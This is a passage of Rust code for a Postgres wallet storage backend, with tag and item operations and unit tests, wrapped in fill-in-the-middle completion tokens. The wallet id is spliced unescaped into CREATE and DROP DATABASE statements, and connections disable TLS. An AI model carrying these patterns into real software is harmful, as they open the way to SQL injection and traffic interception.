tag { &Tag::Encrypted(ref tag_name, ref tag_data) => { match enc_tag_insert_stmt.execute(&[&item_id, tag_name, tag_data]) { Ok(_) => (), Err(err) => { if err.code() == Some(&postgres::error::UNIQUE_VIOLATION) || err.code() == Some(&postgres::error::INTEGRITY_CONSTRAINT_VIOLATION) { return Err(WalletStorageError::ItemAlreadyExists); } else { return Err(WalletStorageError::from(err)); } } } }, &Tag::PlainText(ref tag_name, ref tag_data) => { match plain_tag_insert_stmt.execute(&[&item_id, tag_name, tag_data]) { Ok(_) => (), Err(err) => { if err.code() == Some(&postgres::error::UNIQUE_VIOLATION) || err.code() == Some(&postgres::error::INTEGRITY_CONSTRAINT_VIOLATION) { return Err(WalletStorageError::ItemAlreadyExists); } else { return Err(WalletStorageError::from(err)); } } } } }; } } tx.commit()?; Ok(()) } fn update_tags(&self, type_: &[u8], id: &[u8], tags: &[Tag]) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let tx: transaction::Transaction = transaction::Transaction::new(&conn)?; let res = { let mut rows = tx.prepare_cached("SELECT id FROM items WHERE type = $1 AND name = $2")? .query(&[&type_.to_vec(), &id.to_vec()]); match rows.as_mut().unwrap().iter().next() { Some(row) => Ok(row.get(0)), None => Err(WalletStorageError::ItemNotFound) } }; let item_id: i64 = match res { Err(WalletStorageError::ItemNotFound) => return Err(WalletStorageError::ItemNotFound), Err(err) => return Err(WalletStorageError::from(err)), Ok(id) => id }; tx.execute("DELETE FROM tags_encrypted WHERE item_id = $1", &[&item_id])?; tx.execute("DELETE FROM tags_plaintext WHERE item_id = $1", &[&item_id])?; if !tags.is_empty() { let enc_tag_insert_stmt = tx.prepare_cached("INSERT INTO tags_encrypted (item_id, name, value) VALUES ($1, $2, $3)")?; let plain_tag_insert_stmt = tx.prepare_cached("INSERT INTO tags_plaintext (item_id, name, value) VALUES ($1, $2, $3)")?; for tag in tags { match tag { &Tag::Encrypted(ref tag_name, ref tag_data) => enc_tag_insert_stmt.execute(&[&item_id, tag_name, tag_data])?, &Tag::PlainText(ref tag_name, ref tag_data) => plain_tag_insert_stmt.execute(&[&item_id, tag_name, tag_data])? }; } } tx.commit()?; Ok(()) } fn delete_tags(&self, type_: &[u8], id: &[u8], tag_names: &[TagName]) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let res = { let mut rows = conn.prepare_cached("SELECT id FROM items WHERE type =$1 AND name = $2")? .query(&[&type_.to_vec(), &id.to_vec()]); match rows.as_mut().unwrap().iter().next() { Some(row) => Ok(row.get(0)), None => Err(WalletStorageError::ItemNotFound) } }; let item_id: i64 = match res { Err(WalletStorageError::ItemNotFound) => return Err(WalletStorageError::ItemNotFound), Err(err) => return Err(WalletStorageError::from(err)), Ok(id) => id }; let tx: transaction::Transaction = transaction::Transaction::new(&conn)?; { let enc_tag_delete_stmt = tx.prepare_cached("DELETE FROM tags_encrypted WHERE item_id = $1 AND name = $2")?; let plain_tag_delete_stmt = tx.prepare_cached("DELETE FROM tags_plaintext WHERE item_id = $1 AND name = $2")?; for tag_name in tag_names { match tag_name { &TagName::OfEncrypted(ref tag_name) => enc_tag_delete_stmt.execute(&[&item_id, tag_name])?, &TagName::OfPlain(ref tag_name) => plain_tag_delete_stmt.execute(&[&item_id, tag_name])?, }; } } tx.commit()?; Ok(()) } /// /// deletes value and tags into storage. /// Returns Result with () on success or /// Result with WalletStorageError in case of failure. /// /// /// # Arguments /// /// * `type_` - type of the item in storage /// * `id` - id of the item in storage /// /// # Returns /// /// Result that can be either: /// /// * `()` /// * `WalletStorageError` /// /// # Errors /// /// Any of the following `WalletStorageError` type_ of errors can be throw by this method: /// /// * `WalletStorageError::Closed` - Storage is closed /// * `WalletStorageError::ItemNotFound` - Item is not found in database /// * `IOError("IO error during storage operation:...")` - Failed connection or SQL query /// fn delete(&self, type_: &[u8], id: &[u8]) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let row_count = conn.execute( "DELETE FROM items where type = $1 AND name = $2", &[&type_.to_vec(), &id.to_vec()] )?; if row_count == 1 { Ok(()) } else { Err(WalletStorageError::ItemNotFound) } } fn get_storage_metadata(&self) -> Result<Vec<u8>, WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let res: Result<Vec<u8>, WalletStorageError> = { let mut rows = conn.query( "SELECT value FROM metadata", &[]); match rows.as_mut().unwrap().iter().next() { Some(row) => Ok(row.get(0)), None => Err(WalletStorageError::ItemNotFound) } }; match res { Ok(entity) => Ok(entity), Err(WalletStorageError::ItemNotFound) => return Err(WalletStorageError::ItemNotFound), Err(err) => return Err(WalletStorageError::from(err)) } } fn set_storage_metadata(&self, metadata: &[u8]) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); match conn.execute("UPDATE metadata SET value = $1", &[&metadata.to_vec()]) { Ok(_) => Ok(()), Err(error) => { Err(WalletStorageError::IOError(format!("Error occurred while inserting the keys: {}", error))) } } } fn get_all(&self) -> Result<Box<StorageIterator>, WalletStorageError> { let statement = self._prepare_statement("SELECT id, name, value, key, type FROM items")?; let fetch_options = RecordOptions { retrieve_type: true, retrieve_value: true, retrieve_tags: true, }; let pool = self.pool.clone(); let tag_retriever = Some(TagRetriever::new_owned(Rc::new(pool.get().unwrap()).clone())?); let storage_iterator = PostgresStorageIterator::new(Some(statement), &[], fetch_options, tag_retriever, None)?; Ok(Box::new(storage_iterator)) } fn search(&self, type_: &[u8], query: &language::Operator, options: Option<&str>) -> Result<Box<StorageIterator>, WalletStorageError> { let type_ = type_.to_vec(); // FIXME let search_options = match options { None => SearchOptions::default(), Some(option_str) => serde_json::from_str(option_str)? }; let pool = self.pool.clone(); let conn = pool.get().unwrap(); let total_count: Option<usize> = if search_options.retrieve_total_count { let (query_string, query_arguments) = query::wql_to_sql_count(&type_, query)?; let mut rows = conn.query( &query_string, &query_arguments[..]); match rows.as_mut().unwrap().iter().next() { Some(row) => { let x: i64 = row.get(0); Some(x as usize) }, None => None } } else { None }; if search_options.retrieve_records { let fetch_options = RecordOptions { retrieve_value: search_options.retrieve_value, retrieve_tags: search_options.retrieve_tags, retrieve_type: search_options.retrieve_type, }; let (query_string, query_arguments) = query::wql_to_sql(&type_, query, options)?; let statement = self._prepare_statement(&query_string)?; let tag_retriever = if fetch_options.retrieve_tags { let pool = self.pool.clone(); Some(TagRetriever::new_owned(Rc::new(pool.get().unwrap()).clone())?) } else { None }; let storage_iterator = PostgresStorageIterator::new(Some(statement), &query_arguments[..], fetch_options, tag_retriever, total_count)?; Ok(Box::new(storage_iterator)) } else { let storage_iterator = PostgresStorageIterator::new(None, &[], RecordOptions::default(), None, total_count)?; Ok(Box::new(storage_iterator)) } } fn close(&mut self) -> Result<(), WalletStorageError> { //let pool = self.pool.clone(); //let conn = pool.get().unwrap(); //let _ret = conn.finish(); Ok(()) } } impl PostgresStorage { fn _prepare_statement(&self, sql: &str) -> Result< OwningHandle<Rc<r2d2::PooledConnection<PostgresConnectionManager>>, Box<postgres::stmt::Statement<'static>>>, WalletStorageError> { let pool = self.pool.clone(); OwningHandle::try_new(Rc::new(pool.get().unwrap()).clone(), |conn| { unsafe { (*conn).prepare(sql) }.map(Box::new).map_err(WalletStorageError::from) }) } } impl WalletStorageType for PostgresStorageType { /// /// Deletes the SQLite database file with the provided id from the path specified in the /// config file. /// /// # Arguments /// /// * `id` - id of the SQLite DB file /// * `storage_config` - config containing the location of SQLite DB files /// * `storage_credentials` - DB credentials /// /// # Returns /// /// Result that can be either: /// /// * `()` /// * `WalletStorageError` /// /// # Errors /// /// Any of the following `WalletStorageError` type_ of errors can be throw by this method: /// /// * `WalletStorageError::NotFound` - File with the provided id not found /// * `IOError(..)` - Deletion of the file form the file-system failed /// fn delete_storage(&self, id: &str, config: Option<&str>, credentials: Option<&str>) -> Result<(), WalletStorageError> { let config = config .map(serde_json::from_str::<PostgresConfig>) .map_or(Ok(None), |v| v.map(Some)) .map_err(|err| CommonError::InvalidStructure(format!("Cannot deserialize config: {:?}", err)))?; let credentials = credentials .map(serde_json::from_str::<PostgresCredentials>) .map_or(Ok(None), |v| v.map(Some)) .map_err(|err| CommonError::InvalidStructure(format!("Cannot deserialize credentials: {:?}", err)))?; let config = match config { Some(config) => config, None => return Err(WalletStorageError::ConfigError) }; let credentials = match credentials { Some(credentials) => credentials, None => return Err(WalletStorageError::ConfigError) }; // if admin user and password aren't provided then bail if credentials.admin_account == None || credentials.admin_password == None { return Ok(()) } let url_base = PostgresStorageType::_admin_postgres_url(&config, &credentials); let url = PostgresStorageType::_postgres_url(id, &config, &credentials); match postgres::Connection::connect(&url[..], postgres::TlsMode::None) { Ok(conn) => { for sql in &_DROP_SCHEMA { match conn.execute(sql, &[]) { Ok(_) => (), Err(_) => () }; } let _ret = conn.finish(); () }, Err(_) => return Err(WalletStorageError::NotFound) }; let conn = postgres::Connection::connect(url_base, postgres::TlsMode::None)?; let drop_db_sql = str::replace(_DROP_WALLET_DATABASE, "$1", id); let ret = match conn.execute(&drop_db_sql, &[]) { Ok(_) => Ok(()), Err(_) => Ok(()) }; conn.finish()?; ret } /// /// Creates the Postgres DB schema with the provided name in the id specified in the config file, /// and initializes the encryption keys needed for encryption and decryption of data. /// /// # Arguments /// /// * `id` - name of the Postgres DB schema /// * `config` - config containing the location of postgres db /// * `credentials` - DB credentials /// * `metadata` - encryption keys that need to be stored in the newly created DB /// /// # Returns /// /// Result that can be either: /// /// * `()` /// * `WalletStorageError` /// /// # Errors /// /// Any of the following `WalletStorageError` type_ of errors can be throw by this method: /// /// * `AlreadyExists` - Schema with a given name already exists in the database /// * `IOError("IO error during storage operation:...")` - Connection to the DB failed /// * `IOError("Error occurred while creating wallet file:..)"` - Creation of schema failed /// * `IOError("Error occurred while inserting the keys...")` - Insertion of keys failed /// fn create_storage(&self, id: &str, config: Option<&str>, credentials: Option<&str>, metadata: &[u8]) -> Result<(), WalletStorageError> { let config = config .map(serde_json::from_str::<PostgresConfig>) .map_or(Ok(None), |v| v.map(Some)) .map_err(|err| CommonError::InvalidStructure(format!("Cannot deserialize config: {:?}", err)))?; let credentials = credentials .map(serde_json::from_str::<PostgresCredentials>) .map_or(Ok(None), |v| v.map(Some)) .map_err(|err| CommonError::InvalidStructure(format!("Cannot deserialize credentials: {:?}", err)))?; let config = match config { Some(config) => config, None => return Err(WalletStorageError::ConfigError) }; let credentials = match credentials { Some(credentials) => credentials, None => return Err(WalletStorageError::ConfigError) }; // if admin user and password aren't provided then bail if credentials.admin_account == None || credentials.admin_password == None { return Ok(()) } let url_base = PostgresStorageType::_admin_postgres_url(&config, &credentials); let url = PostgresStorageType::_postgres_url(id, &config, &credentials); let conn = postgres::Connection::connect(&url_base[..], postgres::TlsMode::None)?; let create_db_sql = str::replace(_CREATE_WALLET_DATABASE, "$1", id); let mut schema_result = match conn.execute(&create_db_sql, &[]) { Ok(_) => Ok(()), Err(_error) => { Err(WalletStorageError::AlreadyExists) } }; conn.finish()?; let conn = match postgres::Connection::connect(&url[..], postgres::TlsMode::None) { Ok(conn) => conn, Err(error) => { return Err(WalletStorageError::IOError(format!("Error occurred while connecting to wallet schema: {}", error))); } }; for sql in &_CREATE_SCHEMA { match schema_result { Ok(_) => schema_result = match conn.execute(sql, &[]) { Ok(_) => Ok(()), Err(error) => { Err(WalletStorageError::IOError(format!("Error occurred while creating wallet schema: {}", error))) } }, _ => () } }; let ret = match schema_result { Ok(_) => { match conn.execute("INSERT INTO metadata(value) VALUES($1) ON CONFLICT (value) DO UPDATE SET value = excluded.value", &[&metadata]) { Ok(_) => Ok(()), Err(error) => { //std::fs::remove_file(db_path)?; Err(WalletStorageError::IOError(format!("Error occurred while inserting the keys: {}", error))) } } }, Err(error) => Err(error) }; conn.finish()?; ret } /// /// Establishes a connection to the SQLite DB with the provided id located in the path /// specified in the config. In case of a successful onection returns a Storage object /// embedding the connection and the encryption keys that will be used for encryption and /// decryption operations. /// /// /// # Arguments /// /// * `id` - id of the SQLite DB file /// * `config` - config containing the location of SQLite DB files /// * `credentials` - DB credentials /// /// # Returns /// /// Result that can be either: /// /// * `(Box<Storage>, Vec<u8>)` - Tuple of `SQLiteStorage` and `encryption keys` /// * `WalletStorageError` /// /// # Errors /// /// Any of the following `WalletStorageError` type_ of errors can be throw by this method: /// /// * `WalletStorageError::NotFound` - File with the provided id not found /// * `IOError("IO error during storage operation:...")` - Failed connection or SQL query /// fn open_storage(&self, id: &str, config: Option<&str>, credentials: Option<&str>) -> Result<Box<PostgresStorage>, WalletStorageError> { let config = config .map(serde_json::from_str::<PostgresConfig>) .map_or(Ok(None), |v| v.map(Some)) .map_err(|err| CommonError::InvalidStructure(format!("Cannot deserialize config: {:?}", err)))?; let credentials = credentials .map(serde_json::from_str::<PostgresCredentials>) .map_or(Ok(None), |v| v.map(Some)) .map_err(|err| CommonError::InvalidStructure(format!("Cannot deserialize credentials: {:?}", err)))?; let config = match config { Some(config) => config, None => return Err(WalletStorageError::ConfigError) }; let credentials = match credentials { Some(credentials) => credentials, None => return Err(WalletStorageError::ConfigError) }; let url = PostgresStorageType::_postgres_url(id, &config, &credentials); // don't need a connection, but connect just to verify we can let _conn = match postgres::Connection::connect(&url[..], postgres::TlsMode::None) { Ok(conn) => conn, Err(_) => return Err(WalletStorageError::NotFound) }; let manager = match PostgresConnectionManager::new(&url[..], TlsMode::None) { Ok(manager) => manager, Err(_) => return Err(WalletStorageError::NotFound) }; let pool = match r2d2::Pool::builder().min_idle(Some(0)).max_size(2).idle_timeout(Some(Duration::new(5, 0))).build(manager) { Ok(pool) => pool, Err(_) => return Err(WalletStorageError::NotFound) }; Ok(Box::new(PostgresStorage { pool: pool })) } } #[cfg(test)] mod tests { use super::*; use utils::test; #[test] fn postgres_storage_type_create_works() { _cleanup(); let storage_type = PostgresStorageType::new(); storage_type.create_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..]), &_metadata()).unwrap(); } #[test] fn postgres_storage_type_create_works_for_twice() { _cleanup(); let storage_type = PostgresStorageType::new(); storage_type.create_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..]), &_metadata()).unwrap(); let res = storage_type.create_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..]), &_metadata()); assert_match!(Err(WalletStorageError::AlreadyExists), res); } #[test] fn postgres_storage_get_storage_metadata_works() { _cleanup(); let storage = _storage(); let metadata = storage.get_storage_metadata().unwrap(); assert_eq!(metadata, _metadata()); } #[test] fn postgres_storage_type_delete_works() { _cleanup(); let storage_type = PostgresStorageType::new(); storage_type.create_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..]), &_metadata()).unwrap(); storage_type.delete_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])).unwrap(); } #[test] fn postgres_storage_type_delete_works_for_non_existing() { _cleanup(); let storage_type = PostgresStorageType::new(); storage_type.create_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..]), &_metadata()).unwrap(); let res = storage_type.delete_storage("unknown", Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])); assert_match!(Err(WalletStorageError::NotFound), res); storage_type.delete_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])).unwrap(); } #[test] fn postgres_storage_type_open_works() { _cleanup(); _storage(); } #[test] fn postgres_storage_type_open_works_for_not_created() { _cleanup(); let storage_type = PostgresStorageType::new(); let res = storage_type.open_storage("unknown", Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])); assert_match!(Err(WalletStorageError::NotFound), res); } #[test] fn postgres_storage_add_works_for_is_802() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.add(&_type1(), &_id1(), &_value1(), &_tags()); assert_match!(Err(WalletStorageError::ItemAlreadyExists), res); let res = storage.add(&_type1(), &_id1(), &_value1(), &_tags()); assert_match!(Err(WalletStorageError::ItemAlreadyExists), res); } #[test] fn postgres_storage_set_get_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); assert_eq!(_sort(record.tags.unwrap()), _sort(_tags())); } #[test] fn postgres_storage_set_get_works_for_twice() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.add(&_type1(), &_id1(), &_value2(), &_tags()); assert_match!(Err(WalletStorageError::ItemAlreadyExists), res); } #[test] fn postgres_storage_set_get_works_for_reopen() { _cleanup(); { _storage().add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); } let storage_type = PostgresStorageType::new(); let storage = storage_type.open_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); assert_eq!(_sort(record.tags.unwrap()), _sort(_tags())); } #[test] fn postgres_storage_get_works_for_wrong_key() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.get(&_type1(), &_id2(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##); assert_match!(Err(WalletStorageError::ItemNotFound), res) } #[test] fn postgres_storage_delete_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); assert_eq!(_sort(record.tags.unwrap()), _sort(_tags())); storage.delete(&_type1(), &_id1()).unwrap(); let res = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##); assert_match!(Err(WalletStorageError::ItemNotFound), res); } #[test] fn postgres_storage_delete_works_for_non_existing() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.delete(&_type1(), &_id2()); assert_match!(Err(WalletStorageError::ItemNotFound), res); } #[test] fn postgres_storage_create_and_find_multiple_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let record1 = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record1.value.unwrap(), _value1()); assert_eq!(_sort(record1.tags.unwrap()), _sort(_tags())); storage.add(&_type2(), &_id2(), &_value2(), &_tags()).unwrap(); let record2 = storage.get(&_type2(), &_id2(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record2.value.unwrap(), _value2()); assert_eq!(_sort(record2.tags.unwrap()), _sort(_tags())); } #[test] fn postgres_storage_get_all_workss() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); storage.add(&_type2(), &_id2(), &_value2(), &_tags()).unwrap(); let mut storage_iterator = storage.get_all().unwrap(); let record = storage_iterator.next().unwrap().unwrap(); assert_eq!(record.type_.unwrap(), _type1()); assert_eq!(record.value.unwrap(), _value1()); assert_eq!(_sort(record.tags.unwrap()), _sort(_tags())); let record = storage_iterator.next().unwrap().unwrap(); assert_eq!(record.type_.unwrap(), _type2()); assert_eq!(record.value.unwrap(), _value2()); assert_eq!(_sort(record.tags.unwrap()), _sort(_tags())); let record = storage_iterator.next().unwrap(); assert!(record.is_none()); } #[test] fn postgres_storage_get_all_works_for_empty() { _cleanup(); let storage = _storage(); let mut storage_iterator = storage.get_all().unwrap(); let record = storage_iterator.next().unwrap(); assert!(record.is_none()); } #[test] fn postgres_storage_update_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); storage.update(&_type1(), &_id1(), &_value2()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value2()); } #[test] fn postgres_storage_update_works_for_non_existing_id() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); let res = storage.update(&_type1(), &_id2(), &_value2()); assert_match!(Err(WalletStorageError::ItemNotFound), res) } #[test] fn postgres_storage_update_works_for_non_existing_type() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); let res = storage.update(&_type2(), &_id1(), &_value2()); assert_match!(Err(WalletStorageError::ItemNotFound), res) } #[test] fn postgres_storage_add_tags_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); storage.add_tags(&_type1(), &_id1(), &_new_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); let expected_tags = { let mut tags = _tags(); tags.extend(_new_tags()); _sort(tags) }; assert_eq!(_sort(record.tags.unwrap()), expected_tags); } #[test] fn postgres_storage_add_tags_works_for_non_existing_id() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.add_tags(&_type1(), &_id2(), &_new_tags()); assert_match!(Err(WalletStorageError::ItemNotFound), res) } #[test] fn postgres_storage_add_tags_works_for_non_existing_type() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.add_tags(&_type2(), &_id1(), &_new_tags()); assert_match!(Err(WalletStorageError::ItemNotFound), res) } #[test] fn postgres_storage_add_tags_works_for_already_existing() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let tags_with_existing = { let mut tags = _tags(); tags.extend(_new_tags()); tags }; storage.add_tags(&_type1(), &_id1(), &tags_with_existing).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); let expected_tags = { let mut tags = _tags(); tags.extend(_new_tags()); _sort(tags) };<|fim▁hole|> assert_eq!(_sort(record.tags.unwrap()), expected_tags); } #[test] fn postgres_storage_update_tags_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); storage.update_tags(&_type1(), &_id1(), &_new_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); assert_eq!(_sort(record.tags.unwrap()), _sort(_new_tags())); } #[test] fn postgres_storage_update_tags_works_for_non_existing_id() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.update_tags(&_type1(), &_id2(), &_new_tags()); assert_match!(Err(WalletStorageError::ItemNotFound), res); } #[test] fn postgres_storage_update_tags_works_for_non_existing_type() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.update_tags(&_type1(), &_id2(), &_new_tags()); assert_match!(Err(WalletStorageError::ItemNotFound), res); } #[test] fn postgres_storage_update_tags_works_for_already_existing() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let tags_with_existing = { let mut tags = _tags(); tags.extend(_new_tags()); tags }; storage.update_tags(&_type1(), &_id1(), &tags_with_existing).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); let expected_tags = { let mut tags = _tags(); tags.extend(_new_tags()); _sort(tags) }; assert_eq!(_sort(record.tags.unwrap()), expected_tags); } #[test] fn postgres_storage_delete_tags_works() { _cleanup(); let storage = _storage(); let tag_name1 = vec![0, 0, 0]; let tag_name2 = vec![1, 1, 1]; let tag_name3 = vec![2, 2, 2]; let tag1 = Tag::Encrypted(tag_name1.clone(), vec![0, 0, 0]); let tag2 = Tag::PlainText(tag_name2.clone(), "tag_value_2".to_string()); let tag3 = Tag::Encrypted(tag_name3.clone(), vec![2, 2, 2]); let tags = vec![tag1.clone(), tag2.clone(), tag3.clone()]; storage.add(&_type1(), &_id1(), &_value1(), &tags).unwrap(); let tag_names = vec![TagName::OfEncrypted(tag_name1.clone()), TagName::OfPlain(tag_name2.clone())]; storage.delete_tags(&_type1(), &_id1(), &tag_names).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.tags.unwrap(), vec![tag3]); } #[test] fn postgres_storage_delete_tags_works_for_non_existing_type() { _cleanup(); let storage = _storage(); let tag_name1 = vec![0, 0, 0]; let tag_name2 = vec![1, 1, 1]; let tag_name3 = vec![2, 2, 2]; let tag1 = Tag::Encrypted(tag_name1.clone(), vec![0, 0, 0]); let tag2 = Tag::PlainText(tag_name2.clone(), "tag_value_2".to_string()); let tag3 = Tag::Encrypted(tag_name3.clone(), vec![2, 2, 2]); let tags = vec![tag1.clone(), tag2.clone(), tag3.clone()]; storage.add(&_type1(), &_id1(), &_value1(), &tags).unwrap(); let tag_names = vec![TagName::OfEncrypted(tag_name1.clone()), TagName::OfPlain(tag_name2.clone())]; let res = storage.delete_tags(&_type2(), &_id1(), &tag_names); assert_match!(Err(WalletStorageError::ItemNotFound), res); } #[test] fn postgres_storage_delete_tags_works_for_non_existing_id() { _cleanup(); let storage = _storage(); let tag_name1 = vec![0, 0, 0]; let tag_name2 = vec![1, 1, 1]; let tag_name3 = vec![2, 2, 2]; let tag1 = Tag::Encrypted(tag_name1.clone(), vec![0, 0, 0]); let tag2 = Tag::PlainText(tag_name2.clone(), "tag_value_2".to_string()); let tag3 = Tag::Encrypted(tag_name3.clone(), vec![2, 2, 2]); let tags = vec![tag1.clone(), tag2.clone(), tag3.clone()]; storage.add(&_type1(), &_id1(), &_value1(), &tags).unwrap(); let tag_names = vec![TagName::OfEncrypted(tag_name1.clone()), TagName::OfPlain(tag_name2.clone())]; let res = storage.delete_tags(&_type1(), &_id2(), &tag_names); assert_match!(Err(WalletStorageError::ItemNotFound), res); } fn _cleanup() { let storage_type = PostgresStorageType::new(); let _ret = storage_type.delete_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])); let res = test::cleanup_storage(); res } fn _wallet_id() -> &'static str { "walle1" } fn _storage() -> Box<WalletStorage> { let storage_type = PostgresStorageType::new(); storage_type.create_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..]), &_metadata()).unwrap(); let res = storage_type.open_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])).unwrap(); res } fn _wallet_config() -> String { let config = json!({ "url": "localhost:5432".to_owned() }).to_string(); config } fn _wallet_credentials() -> String { let creds = json!({ "account": "postgres".to_owned(), "password": "mysecretpassword".to_owned(), "admin_account": Some("postgres".to_owned()), "admin_password": Some("mysecretpassword".to_owned()) }).to_string(); creds } fn _metadata() -> Vec<u8> { return vec![ 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8 ]; } fn _type(i: u8) -> Vec<u8> { vec![i, 1 + i, 2 + i] } fn _type1() -> Vec<u8> { _type(1) } fn _type2() -> Vec<u8> { _type(2) } fn _id(i: u8) -> Vec<u8> { vec![3 + i, 4 + i, 5 + i] } fn _id1() -> Vec<u8> { _id(1) } fn _id2() -> Vec<u8> { _id(2) } fn _value(i: u8) -> EncryptedValue { EncryptedValue { data: vec![6 + i, 7 + i, 8 + i], key: vec![9 + i, 10 + i, 11 + i] } } fn _value1() -> EncryptedValue { _value(1) } fn _value2() -> EncryptedValue { _value(2) } fn _tags() -> Vec<Tag> { let mut tags: Vec<Tag> = Vec::new(); tags.push(Tag::Encrypted(vec![1, 5, 8], vec![3, 5, 6])); tags.push(Tag::PlainText(vec![1, 5, 8, 1], "Plain value 1".to_string())); tags.push(Tag::Encrypted(vec![2, 5, 8], vec![3, 5, 7])); tags.push(Tag::PlainText(vec![2, 5, 8, 1], "Plain value 2".to_string())); tags } fn _new_tags() -> Vec<Tag> { vec![ Tag::Encrypted(vec![1, 1, 1], vec![2, 2, 2]), Tag::PlainText(vec![1, 1, 1], String::from("tag_value_3")) ] } fn _sort(mut v: Vec<Tag>) -> Vec<Tag> { v.sort(); v } }<|fim▁end|>
